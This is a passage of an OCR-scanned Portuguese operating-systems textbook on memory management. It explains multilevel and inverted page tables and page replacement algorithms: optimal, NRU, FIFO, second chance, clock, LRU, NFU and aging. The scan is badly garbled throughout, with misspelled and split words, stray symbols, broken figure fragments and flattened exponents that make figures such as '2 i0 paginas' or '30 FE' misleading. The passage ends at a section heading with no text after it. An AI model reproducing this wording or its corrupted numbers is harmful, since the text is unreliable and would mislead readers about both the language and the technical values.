ria leva de 10 a 20 instruęoes da maąuina para ser condm- 
da em algims nanossegundos. Por outro lado, uma ausen¬ 
cia completa {hard miss) ocorre ąttando a própria pagina 
nao esta na memória (c r c claro, lambem nao esta na TLB). 
Rcąucr-sc accsso ao disco para trazer a pagina, o quc leva 
varios milissegundos. Uma ausencia definkwa e milhóes dc 
vezes mais lenia que uma ausencia temporaria. 

_ 3 . 3 4 . I Tabeias de paginas para memóilas 
grandes 

As TLBs podcm ser usadas para acelerar a iraduęao de 
endereęos virluais para endereęos ffsicos em relaęao ao cs- 
ąuema origtoal de tabela dc paginas na memória. Mas esse 
nao e o unico problema que temos de atacar. Ha ainda o 
problema de como lidar com espaęos de endereęo virttia] 
muito grandes, Discmircmos adiante dois modos de lidar 
com lais espaęos. 
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Tabelas de paginas multinkel 

Como metodo iniciaL considere o uso de uma tabela 
de paginas multinfvel. Om exempl osim pies desse metodo e 
mostrado na Figura 3.12. Na Figura 3.12(a), ve~se tim ende- 
reęa virtual de 32 bils dividido em um campo PTI de 10 bits, 
urn campo PT2 de 10 bits c um campo Dedoammm de 12 bils. 
Como o campo Desloammiio tem 12 bits, as paginas sao de 
tamanho 4 KB. Os outros dois campos tern conjuntamente 
20 bits, o que possibilita um total de 2 i0 paginas virtuais. 

O segredo para o metodo de tabela de paginas mu Ili- 
iuvd ć cvitar que lodas elas sejam mantidas na memória 
o tempo todo, especialmente as que nao sao necessfrias, 
Suponha, por exemplo r que um processo necessile de 12 
megabytes: 4 megabytes da base da memória para o código 
do program a, outros 4 megabytes para os dados do progra- 
ma e 4 megabytes do topo da memória para a pil ha. Sobra, 
entre o topo dos dados e a base da pil ha, um gigaotesco 
espaęo nao usado. 

A Figura 3.12(b) mostra como fimciona a tabela de 
paginas com dois iuveis nessc cxemplo. No lado esąuer- 
do, vemos a tabela de paginas de mvel h com 1024 en¬ 
tradas, co rre spo nd en te a o ca mpoPH de 10 bits. Quando um 
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endereęo virtual chega a MM U, ela primeiro exirai o cam- 
po PTI e o utiliza como mdice da tabela de paginas de mvel 
L Cada uma dessas 1024 entradas representa 4 M, pois o 
espaęo total de endereęamento virtual de 4 gigabytes {isto 
e, 32 bits) fol dividido em segment os de 4096 bytes. 

A cni rada da tabela dc paginas dc mvel 1, que e loca- 
lizada por meio do campo PTI do endereęo vinual aponta 
para o endereęo on a moldura de pagina de uma tabela 
de paginas de mvcl 2. A entrada 0 da tabela de paginas de 
mvel 1 aponta para a tabela de paginas de nivel 2 relativa 
ao código do programa; a entrada 1 aponta para a tabela 
dc paginas de mvcl 2 rclativa aos dados c a entrada 1023 
aponta para a tabela dc paginas de mvcl 2 rclativa a pi- 
llia. As out ras entradas {sombreadas} da tabela de paginas 
vimiais dc mvd i nao sao usadas. O campo PT2 c en tao 
empregado como mdice da tabela dc paginas dc mvcl 2 sc- 
lecionada para localizar o nu mero da moldura dc pagina 
fisica corresp o n d en t e. 

Por exempla considere o endereęo virtual de 32 bits 
0x00403004 {4.206.596 cm dlecimal), o qual corresponde a 
localizaęao 12.292 comando-se a partit do i nici o dos dados, 
ou seja, a partir de 4 M. Esse endereęo virtuat corresponde a 


Tabelas de p&ginas 
de nivel 2 



Tabela de paginas 
para os 4 M do 
topo da memória 


Para as 
paginas 


Figura 3.12 {a) Um endereęo de 32 bits com dois campos de tabela de paginas, (b) Tabefas de paginas de dois nivets. 
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PTI = 1, PT2 ~ 2 e Desbcamemo = 4. A MML) primeiro mi li¬ 
żą PTI como mdice da tabela de paginas de mVel 1 e obtem 
3 entrada L que corrcsponde ao endereęo dc urna tabela 
de mvel 2 que contem os endereęos de4M-La£M-l. 
A MM U entao ntiliza PT2 como mdice dessa tabela de mvcl 

2 re cc m-1 ocali za da e obtem a entrada 3, quc corrcsponde 
a os endereęos dc 12288 a 16383 dentro dc sen pcdaęo de 4 
M (isto e, endereęos absolutos de 4.206.592 a 4.210.687). 
Essa entrada contem o nu mero dc moldura de pagina com 
a pagina que contem o endereęo virtual 0x00403004. Se 
essa pagina na o estiver presente na memória, entao o bit 
Prmnte/ausente na entrada dessa tabela de paginas sera zero, 
o que causara unia falta de pagina. Se a pagina esiiver na 
memória, o nu mero da moldura de pagina tirado da tabela 
de paginas de mvel 2 sera combinado com o deslocamento 
{4) para construir o endereęo lisico. Esse endereęo e colo- 
cado no barramento e enviado a memória. 

E imeressante notarna Figura 3.12 que, embora oespa- 
ęo de endereęamento eon ten ha mais de um milhao de pa¬ 
ginas viriuais, someme quatro tabelas de paginas sao real- 
meme necessarias: a tabela de mvel 1 e as tres tabelas de 
mvel 2 referentes aos endereęos dc 0 a 4 M (para o código 
do programa), de 4 M a S M (para os dados) e aos 4 M do 
lopo (para a pilha). Os bits Presente/ausente nas 1021 entra- 
das da tabela de paginas de nfvel 1 sao marcados com 0, 
foręando urna falta de pagina se forem acessados* Se isso 
ocorrer, o sistema operacional sabera que o processo esta 
ten tan do referenciar urna parte nao permitida da memória 
e tomara urna derisao apropriada — como enviar um sinal 
ao processo on elimina-lo* Nesse excmplo, escolhcmos nu- 
meros redondos para os diversos tamanhos c PTI do mes- 
mo ta ma n ho que P72, mas, na pratica, outros valores sao 
obviamente possweis. 

Esse sistema da tabela de paginas em dois nweis da Fi¬ 
gura 3.12 pode ser expandido para tres, ąuatro ou mais 
mveis* Nweis adicionais permitem maior flexibilidade, 
embora seja diwidoso que essa comp!exidade adidonal do 
hardware continue vantajosa alem dos tres nweis. 

Tabelas de paginas invertidas 

Para espaęos de endereęamento virtuais de 32 bits, a 
tabela dc paginas mullinwel lunciona razoavehnente hem. 
Contudo, a medida que aparecem computadores dc 64 bits, 

3 situaęao muda drasiicamenie. Como o espaęo de endere- 
ęamento virtual agora e de 2 bA bytes, se adotarmos paginas 
de 4 KB, precisaremos de urna tabela de paginas com 2 52 
entradas. Se cada entrada comber 8 bytes, essa tabela de 
paginas tera mais de 30 milhóes de giga bytes (30 FE). Re- 
servar 30 milhóes de gigabytes someme para a tabela de 
paginas nao e factwel, nem agora nem nos próximos anos, 
e talvez nim ca. Conseąuentemente, e nccessaria urna solu¬ 
ęao diferente para tratar espaęos de endereęamento virtuais 
paginados de 64 bits. 

U ma posswel soluęao e a tabela de paginas inverti* 
das: nela existe apenas u ma entrada por moldura de pagina 


na memória real, em vez de u ma entrada por pagina do 
espaęo de endereęamento virtual. Por exeinplo, com en¬ 
dereęos \inuais de 64 bits, urna pagina de 4 KB c 1 GB 
de RAM, urna tabela de paginas iiwertidas rcquer apenas 
262.144 entradas. Cada entrada informa quc o par (pro¬ 
cesso, pagina virtual) esta localizado na moldura dc pagina, 

Embora as tabelas de paginas iiwertidas possam eco- 
nomizar muito espaęo — principalmente quando o espaęo 
de endereęamento virtual e muito maior que a memória 
fisica — elas apresentam um próbie ma serio: a traduęao 
de virtual para Esico torna-se muito mais diffcil. Quando 
o processo n referenda a pagina virtual p, o hardware nao 
pode mais encontrar a pagina fisica usando p como mdi- 
cc da tabela dc paginas* Em vcz disso, cle deve pesquisar 
toda a tabela de paginas iiwertidas em busca de unia en¬ 
trada {n,p) t Alem desse proeedimento, essa pesquisa deve 
ser feita a cada referenda a memória, e nao someme nas 
fahas de pagina. Pesquisar u ma tabela de 256 K a cada 
referenda a memória nao e a mdhor maneira de tornar 
su a maquina rapida. 

Urna soluęao posswel para esse dilema e a utilizaęao 
da TLB* Se esta puder eon ter todas as paginas mais inten- 
sa menie usadas, a traduęao pode ocorrer tao rapidamente 
q uan io nas labelas de paginas cotwencionais. Ocorrendo 
uma ausencia na TLB, contudo, a tabela de paginas iiwerti- 
das deve ser pesąuisada no software. Um modo de realizar 
essa pesquisa e ter uma tabela de espalhamento {hash) nos 
endereęos vlrtuais. Todas as paginas virtuais atualmente 
presentes na memória e que tivercm o mesmo valor dc 
espalhamento serao cncadcadas juntas, como mostra a Fi¬ 
gura 3*13. Sc a tabela dc espalhamento apresentar tantas 
entradas ąuantas paginas fisicas a maąuina tiver, o tom- 
primento mćdio de encadćamento sera de somente uma 
entrada, agilizando muito (3 mapeaniemo* Ao encontrar o 
numero da moldura de pagina, a nova dupla (virtual, fisi¬ 
ca) e inserida na TLB. 

Tabelas dc paginas iiwertidas sao comims em maqui- 
nas dc 64 bits porąuc, mesmo com um tamanho dc pagina 
muito grandę, o mimem de entradas de tabelas dc paginas e 
enorme. Por exemplo, com paginas de 4 MB e endereęos 
\4rmais de 64 bits, sao necessarias 2 12 entradas de labelas de 
paginas. Outros metodos para lidar com grandes memórias 
virmais podem ser encontrados em Talluii et al. (1995). 


3.4 


Algoritmo5 de substituicao de 
paginas 


Quando oeorre uma falta de pagina, o sistema opera- 
cional predsa escolhcr urna pagina a ser remoWda da me¬ 
mória a firn de liberar espaęo para uma nova pagina a ser 
trazida para a memória, Sc a pagina a ser removida tivcr 
sido modificada cnąuanto cstava na memória, ela devcra 
ser rcescrila no disco com o propósito dc atualizar a cópia 
virtual la cxisicmc. Se, contudo, a pagina nao tivcr sido 







Sn#w 


Capitulo 3 Gerenciamento de menrtória 121 


Tabela de pAgtnas 
tradicional co m u ma 
entrada para cada u ma 
das 2 52 paginas 



[ndexada 
peta pagina 
virtual 


Memória fJsica de 1 GB 
tern 2 IS molduras de 


pagina de 4 KB Tabela de espalhamento 



Figura 3.13 Comparaęao entre u ma tabela de paginas tradicional e uma tabela de paginas invertidas. 


modificada (por exempIo, unia pagina de código), a cópia 
em disco ja estara atualizada e r assim, nao sera neeessario 
reescreveda. A pagina a ser irazida para a memória sim- 
plesmeme sobrcscrcve a pagina que csia sencio destitufda. 

Embora seja possńeł escolher aleatoriameme uma pa¬ 
gina a ser descartada a ca da falta de pagina, o desempenho 
do sistema sera muito melhor se a pagina escolhida for uma 
que nao estiver sendo muito usada. Se unia pagina inten- 
samente usada for removida, e provavel quc logo ela pre- 
dsc ser trazida dc volia, ocasionando custos cxiras. Muitos 
trabalhos, tcóricos e experimcnlais, tern se vollado para os 
algoritmos de substituięao de paginas. A seguir, descrevere- 
mos alguns dos algoritmos rnais importantes, 

i importantc notar que o problenia da substituięao 
dc paginas tam be ni ocorre em outras areas da concepęao dc 
compmadorcs. Por cxemplo, a maioria dos computadores 
tein nma on rnais caches com os blocos de memória mais 
receniemente usados — blocos que eo n tern 32 ou 64 bytes 
cada um. Se a cache estiver cheia, um dos blocos sera es- 
colhido para ser removido. Esse problenia e precisamente 
a na logo ao da substUuięao de paginas, difermdo apenas na 
duraęao dc tempo envolvida (na cache, a substituięao do 
eonteiido dc um bloco de memória £ rcalizada em pou- 
cos nanossegundos, e nao em mtłissegundos, como na 
substituięao de pagina). A razao para essa reduęao de 
tempo e que uma falta dc bloco (błock miss) na cache 
ć satisfeita a partir da memória prinripal, que nao tem 
retardos resultantes do tempo de rotaęao e dc latencia 
rotadonal do disco, 

Um segundo exemplo e um servidor da Web. O ser- 
vidor pode ma me i um certo numero de paginas da Web 
intensamente usadas em sua cache na memória. Contudo, 
quando a cache estivcr dieia e nma nova pagina for refe- 
renciada, sera preciso decidir qual pagina da Web dcscartar. 
Sao consideraęócs similares aqudas concerncnies as pagi¬ 


nas de memória yirtual exceto pelo falo de que paginas da 
Web nunea sao modificadas na cache e, assim, suas cópras 
em disco estao sempre a tu a li za das, ao passo ąue, em um 
sistema com memória vimial r as paginas na memória po- 
dcm estar lirnpas ou sujas. 

Em todos os algoritmos de substituięao de paginas es- 
tudados a seguir, surge a seguinte questao: qitando uma 
pagina vai ser remoyida da memória, devemos iemover 
uma das paginas do próprio processo que causou a falta ou 
podemos remover uma pagina pertencente a outro proces¬ 
so? No primeiro caso, estamos efetiyamente limitando cada 
processo a um numero fixo de paginas; no segundo, nao o 
fazemos, Ha as duas possibilidades. Retomarcmos a esse 
assunto na Scęao 3.5.1. 

_ 3.4.11 O ałgoritmo ótimo de substituięao 

de pagina 

O mci bor dos algoritmos de subsuLuięao de pagina 
e facil dc descrcver, mas impossivel de impkmeniar. Ele 
funciona da seguinte maneirai no momemo cm que ocor¬ 
re uma falta de pagina, exi$ie urn determinado conjtmto 
de paginas na memória. Uma delas sera referenciada na 
próxima instruęao, ou seja, trata-se da mesma pagina que 
coniem a instruęao qite gerou a falta de pagina. Outras pa¬ 
ginas pode m ser referenda das a te dez, ceni ou talvez mil 
instruęoes mais tarde. Cada pagina pode serrotulada com o 
numero dc instruęoes que serao executadas a mes dc aquc- 
la pagina ser referenciada pcla prirneira vez, 

O ałgoritmo ótimo diz apenas que se deve remover a 
pagina com o maior rótulo. Se determinada pagina só for 
usada após oito millióes de instruęoes e outra pagina só 
for usada após seis milhoes de instruęoes, a prirneira devera 
ser removida a mes da segunda. Dcssa maneira, o algo- 
rilmo ótimo dc substituięao de pagina adia a ocorrencia da 
próxima falta dc pagina o maximo possivd. Computadores, 
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assim como pessoas, temam adiar o maximo possiveI a 
ocorrencia de eventos desagradaras. 

O unico problem a com esse algoritmo c quc dc e irrea- 
lizaveL Na ocorrencia de unia falta dc pagina, o sistema 
operacional na o tem como saber quando cada urna das 
paginas sera referenda da novameme. (ja vimos siiuaęao 
similar no caso do algoritmo de escalonamemo tabela curta 
primeiro — como o sistema operacional pode saber qual 
das tarefas e a mais curta?) Entretanto, execufar primeiro o 
programa em urn simulador e guardar todns as referendas 
as paginas possibilita implemcmar o algoritmo ótimo na 
sąjunda execuęao desse programa, usando as informaęóes 
colctadas duranie a pńmtira exccuęao. 

Desse modo, lorna-se possivei comparar o desempe¬ 
nho dos algoritmos realizaveis com o do melhor posswel. 
Se um sistema operacional liver um algoritmo de substi- 
tuięao de pagina com desempenho de, digamos, somente 1 
por cen to piór que o do algoritmo ótimo, todos os esforęos 
despendidos para mcłhorar esse algoritmo proporcionarao 
lima mclhora dc, no maximo, i por ccnto. 

Para evitar qualquer posswel confusao, e predso dei- 
xar claro que esse regisiro {log) de referendas as paginas e 
concernente apenas a execnęao de um programa especifico 
com dadps de entrada especificos* O algoritmo de substitui- 
ęao de pagina derivado dat e especifico daąudc programa e 
daqudes dados. Embora esse metodo auxilic na avaliaęao 
de algoritmos dc substituięao de pagina, de e inutil para 
uso cm sistemas praticos. A seguir, estudaremos algoritmos 
titeis em sistemas reais. 

_ ł.4.21 o algoritmo de substituicao de pagina 

tiao usada recentemente (NRU) 

A maioria dos computadores com memória viruial Lem 
2 bits de status — o bit refcrenciado (#) e o bit modifica- 
do (M) —, associados a cada pagina viruial, que permitem 
quc o sistema operacional saiba quais paginas Eisicas estao 
sendo usadas c quais nao esiao, O bit R c colocado em 1 
sempre que a pagina e referendada (lida ou escrita), O bil 
M e colocado em i sempre que se e$creve na pagina (isto 
e, a pagina e modificada)* os bits estao comidos em cada 
entrada da tabela de paginas, como mostra a Figura 3.11. 
E imporlante perceber que esses bits dcvem ser atualizados 
em lodas as referendas a memória, dc modo que e essen- 
dal quc cssa atualizaęao se de por hardware* Uma vez quc 
um bit e colocado cm i por hardware, de permanete em 1 
atć o sistema operacional rei ni ciał i za-lo, 

Se o hardware nao possui esses bits, estes podem ser 
simulados da seguinte maneira: um processo, ao ser inicia- 
lizado, tem lodas as suas entradas da tabela de paginas mar- 
cadas como nao presentes na memória, Tao logo uma de 
suas paginas virtuais seja referendada, ocorre uma falta de 
pagina, Entao, o sistema operacional coloca o bit R em i (em 
suas tabdas intemas), altera a entrada da tabela de paginas 
a firn de apontar para a pagina ffsica correta, com modo SO¬ 


MENTE LEITURA, e remicializa a insiruęao. Se a pagina for 
subseąuentemente modificada, outra falta de pagina ocorre- 
ra, permitindo que o sistema operacional coloque o bit M em 
1 e altere o modo da pagina para LE1TUR A/ESC RITA, 

Os bits R e M podem ser usados para construir um al¬ 
goritmo dc paginaęao simples, tal como seguc* Quando um 
processo ć inicializado, os dois bits citados, para todas as 
suas paginas, sao colocados em 0 pdo sistema operacional 
Periodicamente (por cxemplo, a cada tiquc do rdógio), o 
bil R e lim po., de modo que diferencie as paginas que nao 
foram referendadas recentemente daąudas que foram, 
Quando acontecc uma falta de pagina, o sistema ope- 
radonal inspeciona todas as paginas e as separa em ąuatro 
categorias, com base nos valores atuais dos bits R e Ah 
Classe 0: nao referendada, nao modificada, 

Classe 1; nao referendada, modificada. 

Classc 2: referendada, nao modificada. 

Classe 3; referendada, modificada. 

Embora as paginas da classe 1 pareęam, a primeira vis- 
ta, impossfveis de ocorrer, elas surgem quando uma pagiua 
da classe 3 tem sou bil R limpo por uma interrupęao do re- 
lógio. As interrupęóes do relógio nao limpam o bit M, pois 
essa informaęao e necessaria para saber se a pagina deve ou 
nao ser rcescriia em disco, A limpeza do bit R , mas nao do 
bit M r conduz a classe 1. 

O algoritmo NRU (not recently used ■— nao usada rcccn- 
temente) removc alcatoriomentc uma pagina da classc dc 
ordem mais baixa quc nao esteja vazia. Esia implidio nesse 
algoritmo que c melhor temover uma pagina modificada, 
mas nao referendada, a pelo menos um tique do relógio 
(cm gcral, 20 ms) do quc uma pagina nao modificada que 
esia sendo intcnsamcntc referendada. A prindpai vanta- 
gem do algoritmo NRU c ser facii de entender e de i nipie- 
men tar c, alem disso, fornece um desempenho que, apesar 
de nao ser ótimo, pode ser adeąuado* 

_ 3 . 4.3 1 o algoritmo de substituięao de pagina 

primeiro a entrar, primeiro a sair 

O algoritmo de substitinęao de pagina primeiro a en¬ 
trar, primeiro a sair {fim-bi first-ont — FIFO) e um algo- 
rilmo de baixo custo. Para ilustrar seu fundonamento, ima- 
ginę um supennercado que lenha diversas prateleiras para 
acomodar exatamente k produtos diferentes. Um dla, uma 
empresa lanca um produto — iogiute organico, seco e conge- 
lado, com reconstituięao instantanea no forno de micro-on- 
das* & um sucesso imediato, de modo que nosso supermerca- 
do, que tem espaęo li mi ta do, sc ve obrigado a sc livrar dc um 
produto velho para conseguir espaęo para o novo produto. 

Uma sohięao seria dcscobrir qual produto o stipermer- 
cado vem estocando ha mais tempo (por exemplo, algo que 
ele comeęou a vender 120 anos atras) e st: livrar dele supon- 
do quc ntnguem mais se mieressa por cle. Por so m, o super- 
mcrcado mantem uma lista cncadeada dc todos os produtos 
que autalmeme vende na ordem em que eles foram introdu- 
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zidos. O novo produto entrara no fmal dessa lisia encadeada; 
o primeiro produto iii&odimdo na lista sera diminado. 

Pode-se aplicar a mesma idda a uni algoritmo de subs- 
titulęao de pagina. O sistema operacional mantem nma lista 
de todas as paginas atualmcnte na memória, tom a pagina 
mais antiga na cabeęa da lisia e a pagina que chegou mais 
reccriteincnte situada no finał dessa lista, Na ocorrenda de 
linia falta dc pagina, a primcira pagina da lista ć removida 
e a nova pagina e adicionada no finał da lista. Quando se 
aplica o algoritmo FIFO a armazem, pode-se Lamo reniovcr 
itens pouco vendidos, como cera para bigo des, ąuanto itens 
muito vendidos, como farinha, sal ou manteiga, Quando se 
aplica o algoritmo FIFO a compuiadores, surge o mesrno 
próbie ma. Por essa razao, o algoritmo de substituięao de pa¬ 
gina FIFO, em sua configuraęao pura, raranienie e osado. 

_ 5.4.41 O algoritmo de substituięao de 

pagina segunda chance 

Unia modificaęao skupi es no algoritmo de substituięao 
de pagina FIFO evita o prób km a de se jogar fora nma pagi¬ 
na iutensamente osada, e isso e feito simplesmente inspe- 
cionando o bit R da pagina mais a miga, ou seja, a primeira 
pagina da fila. Se o bil R for 0, essa pagina, alem de ser 
a mais antiga, nao estara sendo usada, de modo que sera 
substitufda imediaiameoie. Se o bit R for 1, de sera colo- 
cado em 0, a pagina sera posta no finał da lista dc paginas 
e seu tempo de carregamento (chegada) sera atualizado 
como se ela iivesse acabado de ser ca rr ega da na memória. 
A pesquisa entao continua. 

O funcionamento desse algoritmo, chamado de segun¬ 
da chance, e most rado na Figura 3.14, Na Figura 3.14(a), 
vemos as paginas de A a H mantidas em urna lista encadeada 
e ordenada por tempo dc chegada na memória. 

Suponha quc urna falta dc pagina ocorra no i usta li¬ 
te 20. A pagina mais antiga e a pagina A f que chegou no 
i mianie 0 ąuando o processo foi inicializado* Se o bit R da 
pagina A for 0, ela sera retirada da memória, tendo sua 
cópia em disco atuaiizada se houver sido modificada (suja), 
ou sera simplesmente abandonada se nao tiver sido modi¬ 
ficada (se esliver limpa). Por outro lado, se o bit R for 1, a 


pagina A sera colocada no finał da lista e seu instame de 
carregamento' sera atualizado com o valor atual (20). O bit 
R e colocado em 0, c a busca por urna pagina a ser substi- 
Uuda continua entao a parlir da pagina R 

O que o algoritmo segunda chance faz e procurar 
urna pagina antiga que nao tenha sido referenciada no 
intervalo de relógio anterior Se todas as paginas foram 
referendadas, o segunda chance degenera-se para o FIFO 
puro. Especifica menie, imagine que todas as paginas na 
Figura 3.14(a) tenham scus bils R em L Unia a urna, as 
paginas sao reinseridas no finał da lista pelo sistema ope¬ 
racional, e o bit R de ca da pagina e ze rado. Quando a pagina 
A for no va nieme a pagina mais antiga — ou seja, ąuando 
estiver dc novo na cabeęa da lista —, da tera seu bit R 
em 0 e podera, entao, ser substiunda, Assim o algoritmo 
sempre lenni na. 

_ 3.4,5 1 O algoritmo de substituięao de 

pagina do relógio 

Embora o segunda chance seja um algoritmo razoa- 
vd, de e desnecessariamente inefkaz, pois permanece 
comtantemente reinserindo paginas no finał da lista. Urna 
esira legia melhor e manier todas as paginas em u ma lisia 
drcular em forma de relógio, como mosira a Figura 3J5, 
Um pomeiro aponia para a pagina mais a miga, ou seja, 
para a "cabeęa' da lisia. 

Quando ocorre urna falta de pagina, a pagina indicada 
pelo ponteiro e examinada. Se o bit R for 0, a pagina e rc- 
movtda, a nova pagina e inserida em seu lugar no relógio e 
o ponteiro avanęa u ma posięao. Se R for 1, eie e zerado e o 
pomeiro avanęa para a próxima pagina. Esse processo e re- 
petido ale que urna pagina seja encomrada com R = 0. Nao e 
de surpreender que esse algoritmo seja chamado de relógio, 

_ 3-4.61 Aigoritmo de substituięao de pagina 

usada menos recentemente (LRU) 

Uma boa aproxiniaęao do algoritmo ótimo dc substi- 
luięao de pagina e baseada na observaęao dc quc as pagi¬ 
nas muito uttlizadas nas ultimas instruęócs provavclmente 
sera o muito utiiizadas novamente nas próximas instruęoes. 


Pagina ca rregad a primeiro 



(a) 


8 12 14 15 18 20 




Pagina carregada 
mais recentemente 


A ó tratada com uma 
pagina rec^m-carregada 


(b) 


Figura 3.14 Operagao de segunda chance. (aj Paginas na ordem FIFO, (b) Lista de paginas se uma falta de pagina ocorre no 
tempo 20 e o bit R de A possui o vaior 1. Os numeros acima das paginas sao seus tempos de carregamento. 
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Quando ocorre urna falta de pńgtna, 
a p&gina indicada pęto ponteiro 
e inspedonada. Aaęao Gxecutada 
depende do bit R: 

R ~ O: Remover a pagina 
R = 1: Zerar R e auanęar o ponteiro 

t Figura 3.15 Algoritmo de substituięao de pagina reiógio. 


Ao contrario, paginas quc nao estao sendo utilizadas por 
um longo periodo dc tempo provavclmcntc pemianece¬ 
ra o inutilizadas por miii to tempo. Essa ldcia sugcic um 
algoritmo rcalizavcl: ąuando ocorrer uma falta dc pagina, 
eliminea pagina nao utilizada pelo penodo de tempo mais 
longo, Essa estrategia e chamada de paginaęao LR u (kast 
recetniy used — usada menos recentemente). 

Embora o LR U seja te orka menie realizavel, nao e ba- 
rato. Para implcmentar completamente o LRU, ć ncccs- 
sario mantęr uma lista vinculada dc todas as paginas na 
memória, com a pagina usada mais recentemente na dian- 


teira e a pagina usada menos recentemente na parte de 
tras. A dificuldade e que a lista deve ser atualizada em cada 
referenda a memória* Encomrar uma pagina na lista, dcię¬ 
ta--la e posiciona-la na dianteira e uma operaęao de mora- 
da, mesmo no hardware (supondo que um hardware assim 
possa ser construido). 

Entretanto, ha outros modos de implementar o LRU 
com hardwares espedais, Considcrcmos o modo mais sim- 
ples primeiro. Esse metodo requer epuipar o hardware com 
um eontador de 64 bils, C, que e automaticamente inere- 
mentado após cada instmęao. Alem do mais, cada entrada 
na tabela de paginas tambem deve ter um campo grandę o 
su nicienie para acomodaro eontador. Após cada referenda 
a memória, o valor atual de Ce armazenado na entrada da 
tabela de paginas para a pagina que acaba de ser referenda- 
da, Quando ocorre uma falta de pagina, o sistema operado- 
nal examma todos os contadores na tabela dc paginas para 
encorurar o me nor dcl es. A pagina correspondente a esse 
menor valor sera a “usada menos recentemente". 

Examinemos agora uma segunda maneira cle imple¬ 
mentar o algoritmo LRU com o auxiłio de um hardware 
espedal. Para uma maquina com n molduras de pagina, 
esse hardware auxiiiar pode conter uma matriz de n x n 
bits, inidalmente todos com o va!or 0. Sempre que a mol- 
dura de pagina k for referendada, esse hardware auxiliar 
primdto marcara todos os bils da linha k com o valor I e, 
em seguida, todos os bits da coluna k com o valor 0. Em 
um instante qualqucr, a linha que possuir o menor valor 
binario sera a pagina LRU ■—ou seja, a pagina usada menos 
recentemente —, e a linha cujo valor binario seja o mais 
próximo do menor sera a segunda usada menos receme¬ 
mento e assim por dianie. O funcionamcnto desse atgo- 
ritmo e mostrado na Figura 3.16 para ąuatro molduras de 
pagina e referencias a paginas na ordem 
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Figura 3.t6 LRU usando uma matriz ern qite as paginas sao referenciadas na ordem 0, 1,2. 3, 2, i . 0, 3, 2, 3. 
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Após a pagina O ser referenciada, lenios a situaęao da 
Figura 3.16(a). Após a pagina ! ser referenci a da, temos a 
simaęao da Figura 3.1ó{b) e assim sucessivamente. 

5A71 Simulatao do LRU em software 

Embora ambas as irnplementaęoes anteriores ao LRU 
sejam (em prinapio) pcrfcitamenie rcalizaveis, poucas 
maąumas — talvez nenhuma — tcm essc hardware. 
Assim, e necessario encontrar unia soluęao implementavel 
em software. Urna possibilidade e empregar o algoritmo de 
substituięao de pagina nao usada frequentemenie (NFU — 
not freąumily med). A implementaęao desse algoritmo re- 
quer contadores em software, cada um deles associado a 
unia pagina, inicialmente zerados. A cada interrupęao de 
relógio, osistema operacional percorre todas as paginas na 
memória. Para cada pagina, o bit R t que pode esiar em 0 
ou 1, € adicionado ao comador correspondeme. Assim, es- 
ses contadores constituem urna temativa de saber quamas 
vez.es cada pagina ja foi referenciada, Quando ocorrer usną 
falta de pagina, a pagina que tivera menor coniagem sera 
sekcionada para a substituęao. 

O problcma principal com o algoritmo NFU c quc de 
ninica sc csquccc dc nada. Por cxcmpio, cm um compila- 
dor dc multiplos passos, paginas que forani mtensamente 
referenciadas duranie o passo 1 podem ainda ter um conta- 
dor alto em passos bem posteriores. De falo, se acomecerde 
o passo I possuir o tempo de execuęao mais longo de todos 
os passos, as paginas que comiverem o código para os pas¬ 
sos seguimes poderao ter sempre contadores menores do 
que as paginas do passo 1. Conseąuentemente, o sistema 
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operacional removera paginas que ainda estiverem sendo 
referenciadas, em vez daąuelas que nao o estao mais. 

FeKzmente, u ma pequena tnodiflcaęao no algoritmo 
NFU possibilita a simulaęao do algoritmo LRU. Essa modi- 
fkaęao tcm dois passos. Pr i mci ro, os contadores sao deslo- 
cados um bit a direita. Em seguida, o bit R de cada pagina e 
adicionado ao bit mais a esquerda do comador correspon¬ 
dente, cm vez de a o bit mais a direita, 

A Figura 3.17 ilustra como funciona esse algoritmo 
modificado, larnbcm conhecido como algoritmo de en- 
velhedmento {ciging). Suponha que, após a primeira in- 
terrupęao de relógio, os bits R das paginas 0 a 5 ten ha m, 
rcspectivamente, os valores L 0, U 0, J c l (pagina 0 ć 
I, pagina J e 0, pagina 2 e 1 ctc.). Em outras palavras, 
enire as inierrupędes de relógio 0 e i, as paginas 0, 2, 4 e 
5 foram referenciadas e, assim, sens bits R forani coloea- 
dos cm L cnąuanto os bits R das outras paginas perma- 
neceram em 0. Após os seis contadores correspondentes 
terem sido deslocados um bit a direita e cada bit R ter 
sido inserido a esquerda, csses contadores terno os valores 
mostrados na Figura 3,17(a). As ąuatro colunas restantes 
most ram os seis contadores após as ąuatro interrupęoes 
de relógio seguintes. 

Quando ocorrc urna falta dc pagina, a pagina que 
tern a menor contagem e removida, fi claro que a pagina 
que nao tiver sido referenciada por, digamos, ąuatro hitcr- 
rupęoes de relógio tera ąuatro zer os nas posięóes mais 
signilicativas de seu comador e, assim, possuira um valor 
menor do que um comador quc nao tiver sido refcrenciado 
por tres interrupędes de relógio. 
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Btts R para as 
paginas 0-5, 
interrupęao de 
relógio 3 


Bits flpara as 
paginas 0-5, 
interrupęao de 
relógio 4 


I Figura 3.T7 O algoritmo de erwelhecimento simula o LRU em software. Sao mosłradas seis paginas para cinco interrupęoes de 
relógio. As cinco interrupędes de relógio s&o representadas de (a) ate (e). 
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Esse algoritmo difere do LRU de duas maneiras. Gbser- 
ve as paginas 3 e 5 na Figura 3.17(e). Nenhuma delas foi 
referendada por duas interrupcoes de rdógio; mas ambas 
fora ni referenda da s na interrupęao anterior aąuelas. Dc 
acordo com o LRU, sc urna pagina tiver dc ser substitmda, 
deveremos cscolhcr u ma das duas. O problema c quc nao 
sabemos qual dessas paginas foi referendada por ultimo no 
intervalo entre as interrupęoes dc rdógio I c 2. Registran- 
do somente um bil por intetYalo de tempo, perciemos a 
capacidade dc distinguir a ordem das referendas demro de 
um mesmo internie. Tudo o que podemos fazer e remo- 
ver a pagina 3, pois a pagina 5 foi referendada duas inter- 
rupęoes de relógio a mes e a pagina 3, nao. 

A segunda diferenęa entre o algoritmo LRU c o de en- 
velliedmento e que, neste ultimo, os contadores tem um 
n u mero finito de bits (8 bits no exemplo dado), Imagine 
duas paginas, ambas com sens contadores zerados. Só nos 
resta substituir inna delas aleatoriameme. Na realidade, e 
basta nic possfvd que urna das paginas tenha sido referen¬ 
dada pcla ultima vcz nove intervalos atras c a ontra o te¬ 
ll ha sido ha mil intern)os. Nao temos como verificar isso. 
Na pratica, porem, 8 bits geralmente sao suRcientes se a 
interrupęao de rdógio ocorrer a cada 20 m$. Se unia pagina 
ficar sem ser referendada durante 160 ms, provavelniente 
ela nao e tao importante. 

_ 3.4.81 o algoritmo de substituięao de 

pagina do conjunto de trabaiho 

